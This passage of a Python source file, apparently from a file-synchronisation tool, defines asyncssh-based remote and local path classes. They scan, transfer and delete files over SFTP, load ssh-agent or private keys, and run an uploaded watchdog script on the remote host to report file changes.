self._sftp = await self.conn.start_sftp_client(env={'block_size': 32768})
return self._sftp
# def connection_lost(self, exc):
# print('*** CONNECTION LOST ***')
async def ssh_connect(self):
options = asyncssh.SSHClientConnectionOptions(client_keys=self.key if self.key is not None else None,
password=self.password if self.key is None else None
)
if self.jump:
self._tunnel = await asyncssh.connect(self.jump_host, port=self.jump_port, username=self.jump_user, options=options)
self._conn = await self._tunnel.connect_ssh(self.host, port=self.port, username=self.user, options=options)
else:
self._conn = await asyncssh.connect(self.host, port=self.port, username=self.user, options=options)
# self._conn.connection_lost = self.connection_lost
return self._conn
@staticmethod
def load_agent_keys(agent_path=None):
"""
The ssh-agent is a convenience tool that aims at easing the use of
private keys protected with a password. In a nutshell, the agent runs on
your local computer, and you trust it enough to load one or several keys
into the agent once and for good - and you provide the password
at that time.
Later on, each time an ssh connection needs to access a key,
the agent can act as a proxy for you and pass the key along
to the ssh client without the need for you to enter the password.
The ``load_agent_keys`` function allows your python code to access
the keys currently known to the agent. It is automatically called by the
:class:`~apssh.nodes.SshNode` class if you do not explicitly specify the set of
keys that you plan to use.
Parameters:
agent_path: how to locate the agent;
defaults to env. variable $SSH_AUTH_SOCK
Returns:
a list of SSHKey_ keys from the agent
.. note::
Use the command ``ssh-add -l`` to inspect the set of keys
currently present in your agent.
"""
# pylint: disable=c0111
async def co_load_agent_keys(agent_path):
# make sure to return an empty list when something goes wrong
try:
agent_client = asyncssh.SSHAgentClient(agent_path)
keys = await agent_client.get_keys()
agent_client.close()
return keys
except ValueError as exc:
# not quite sure which exceptions to expect here
log.error(f"When fetching agent keys: "
f"ignored exception {type(exc)} - {exc}")
return []
agent_path = agent_path or os.environ.get('SSH_AUTH_SOCK', None)
if agent_path is None:
return []
loop = asyncio.get_event_loop()
return loop.run_until_complete(co_load_agent_keys(agent_path))
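    # Usage sketch (editor's addition): with an ssh-agent running and
    # $SSH_AUTH_SOCK set, the keys it holds can be inspected as, e.g.:
    #     keys = RemotePath.load_agent_keys()
    #     log.info('%d key(s) available from the agent', len(keys))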
@staticmethod
def import_private_key(filename):
"""
Attempts to import a private key from file
Prompts for a password if needed
"""
sshkey = None
basename = os.path.basename(filename)
filename = os.path.expanduser(filename)
if not os.path.exists(filename):
log.error("No such key file {}".format(filename))
raise FileNotFoundError
with open(filename) as file:
data = file.read()
try:
sshkey = asyncssh.import_private_key(data)
except asyncssh.KeyImportError:
while True:
passphrase = getpass.getpass("Enter passphrase for key {} : ".format(basename))
if not passphrase:
log.info("Ignoring key {}".format(filename))
break
try:
sshkey = asyncssh.import_private_key(data, passphrase)
break
except asyncssh.KeyImportError:
log.error("Wrong passphrase")
return sshkey
def check_connection(self):
return run(self._check_connection())
async def _check_connection(self):
if time.time() - self._last_check < 30:
return True
self._last_check = time.time()
if self._conn is None:
await self.conn # This will initialize the connections
await self.sftp
try: # Check connection to remote host
# Check path is valid
if await self.sftp.isdir(self.path):
return True
return False
except TimeoutError:
return False
def all_files(self):
res = run(self._files_path()) # This returns all files in default path
if not isinstance(res, list):
return [res]
return res
async def _recursive_scan(self, path, files):
if await self.sftp.isfile(path):
return [[(await self.sftp.stat(path)).mtime, path]]
tasks = set()
async for f in self.sftp.scandir(path):
if f.filename in ('.', '..'): # Ignore reference to self and parent
continue
if stat.S_ISLNK(f.attrs.permissions): # Ignore symbolic links
continue
remotepath = os.path.join(path, f.filename)
if not self.has_pattern(remotepath, self.path) or self.has_ignore(remotepath, self.path):
continue
if stat.S_ISDIR(f.attrs.permissions):
tasks.add(asyncio.create_task(self._recursive_scan(remotepath, files)))
else:
files.append([f.attrs.mtime, remotepath])
if tasks:
await asyncio.gather(*tasks)
return files
async def _files_path(self, path=None):
path = self.path if path is None else path
files = await self._recursive_scan(path, [])
files = [File(path, time, self) for time, path in files]
return files[0] if len(files) == 1 else files
async def get_content(self, path):
fd = BytesIO()
try:
async with self.open_sem:
async with self.sftp.open(path, 'rb') as src:
data = await src.read()
fd.write(data)
except asyncssh.SFTPNoSuchFile:
return None
return fd.getvalue()
async def get_time(self, path):
return (await self.get_file(path)).time
async def get_file(self, path):
try:
return await self._files_path(path)
except (asyncssh.ProcessError, asyncssh.SFTPNoSuchFile):
raise FileNotFoundError
async def _writefile(self, origin, target, mtime):
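        # Editor's note: ensure every parent directory of the target exists by
        # walking the path component by component (an SFTPFailure on an already
        # existing directory is tolerated below), then write the file contents
        # and preserve the origin's modification time.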
path = self.sftp.encode(os.path.dirname(target))
curpath = b'/' if posixpath.isabs(path) else (self.sftp._cwd or b'')
for part in path.split(b'/'):
curpath = posixpath.join(curpath, part)
try:
await self.sftp.mkdir(curpath, asyncssh.SFTPAttrs())
except asyncssh.SFTPFailure:
mode = await self.sftp._mode(curpath)
if not stat.S_ISDIR(mode):
path = curpath.decode('utf-8', errors='replace')
raise asyncssh.SFTPFailure(f'{path} is not a directory') from None
data = BytesIO(origin).read()
async with self.open_sem:
attrs = asyncssh.SFTPAttrs(atime=mtime.timestamp(), mtime=mtime.timestamp())
async with self.sftp.open(target, 'wb', attrs) as dst:
await dst.write(data)
await dst.utime(times=(mtime.timestamp(), mtime.timestamp()))
async def _deletefile(self, target):
try:
await self.sftp.remove(target)
except (asyncssh.ProcessError, asyncssh.SFTPNoSuchFile):
pass
def start_watchdog(self):
assert self.tasks is None, 'Already initialized the watchdog'
self.tasks = Queue(maxsize=-1)
import src.watchdog_service
src_path = os.path.abspath(src.watchdog_service.__file__)
async def upload_watchdog():
await self.sftp.put(src_path, '/tmp/iris_wd.py')
log.debug('Running remote wd')
run(upload_watchdog())
self.wd = RemoteWDThread(self)
self.wd.start()
while self.wd.process is None:
time.sleep(1e-2)
def cleanup(self):
if self.wd is None:
return
self.wd.process.terminate()
def next_task(self):
# Be sure the connection does not drop here
self.check_connection()
return super().next_task()
class RemoteWDThread(Thread):
def __init__(self, holder):
Thread.__init__(self)
# Setup remote connection
self.path = holder.path
self.user = holder.user
self.host = holder.host
self.port = holder.port
# Setup jump connection
self.jump = holder.jump
self.jump_user = holder.jump_user
self.jump_host = holder.jump_host
self.jump_port = holder.jump_port
# Authentication
self.key = holder.key
self.password = holder.password
# WD setup
self.tasks = holder.tasks
self.holder = holder
self.pattern = holder.pattern
self.ignore_pattern = holder.ignore_pattern
self.process = None
def run(self):
loop = asyncio.new_event_loop()
async def async_wd():
options = asyncssh.SSHClientConnectionOptions(client_keys=self.key if self.key is not None else None,
password=self.password if self.key is None else None
)
provider = asyncssh.connect
if self.jump:
self._tunnel = await asyncssh.connect(self.jump_host,
port=self.jump_port, username=self.jump_user,
options=options)
provider = self._tunnel.connect_ssh
async with provider(self.host, port=self.port,
keepalive_interval=60, keepalive_count_max=9,
options=options) as conn:
async with conn.create_process('python3 -u /tmp/iris_wd.py',
input='\n'.join([self.path, self.pattern, self.ignore_pattern]),
stderr=asyncssh.STDOUT) as process:
self.process = process
line = False
while True:
try:
line = (await process.stdout.readline()).split('%')
path, isdir, change, mtime = line
log.debug(f'Remote WD event: {path} {isdir} {change} {mtime}')
if change != 'D':
mtime = None
self.tasks.put(File(path, mtime, self.holder, change))
except Exception as e:
# TODO: Probably here the conn and tunnel should be closed?
while line:
log.debug(line)
log.debug(e)
line = await process.stdout.readline()
break
loop.run_until_complete(async_wd())
loop.close()
class LocalPath(Path):
def __init__(self, path, dry=False, pattern='*', ignore_pattern='//', *args, **kwargs):
super().__init__(os.path.expanduser(path), dry, pattern, ignore_pattern, *args, **kwargs)
self.host = 'local'
self.open_sem = asyncio.Semaphore(128) # Max open files?
def check_connection(self):
if os.path.isdir(self.path):
return True
return False
def all_files(self):
files = []
for root, _, fs in os.walk(self.path):
for name in fs:
path = os.path.join(root, name)
if os.path.islink(path): # Ignore sys links
continue
if not self.has_pattern(path, self.path) or self.has_ignore(path, self.path):
continue
time = pathlib.Path(path).stat().st_mtime
files.append(File(path, time, self))
return files
async def get_content(self, path):
async with self.open_sem:
async with async_open(path, 'rb') as f:
return await f.read()
async def get_file(self, path):
return File(path, pathlib.Path(path).stat().st_mtime, self)
async def get_time(self, path):
return (await self.get_file(path)).time
async def _writefile(self, origin, target, mtime):
os.makedirs(os.path.dirname(target), exist_ok=True)
async with self.open_sem:
async with async_open(target, 'wb') as f:
await f.write(origin)
os.utime(target, (mtime.timestamp(), mtime.timestamp()))
async def _deletefile(self, target):
try:
os.remove(target)
except FileNotFoundError:
pass
def _wd(path, self, q):
from src.watchdog_service import run_wd
run_wd(path, queue=q, log=True, pattern=self.pattern, ignore_pattern=self.ignore_pattern)
while True:
path, isdir, change, mtime = q.get().split('%')
log.debug(f'Local WD event: {path} {isdir} {change} {mtime}')
if change != 'D':
mtime = None
self.tasks.put(File(os.path.relpath(path), mtime, self, change)) # TODO: This works but is not abs, why?
def start_watchdog(self):
assert self.tasks is None, 'Already initialized the watchdog'
self.tasks = Queue(maxsize=-1)
self.wd = Thread(target=LocalPath._wd, args=(os.path.abspath(self.path), self, Queue(maxsize=-1)))
self.wd.daemon = True
self.wd.start()
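

# --- Usage sketch (editor's addition, not part of the original module) ---
# A hedged example of a one-shot local-to-remote sync using the classes above.
# Paths and the host string are placeholders; RemotePath may prompt for a
# password if no usable SSH key is found.
if __name__ == "__main__":
    local = LocalPath('~/project', pattern='*.py')
    remote = RemotePath('/home/user/project', 'user@remote.example.com:22',
                        pattern='*.py')
    if local.check_connection() and remote.check_connection():
        files = local.all_files()
        if files:
            # write() returns a coroutine per file; run() drives them to completion.
            run([local.write(f, remote) for f in files])
        remote.cleanup()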
|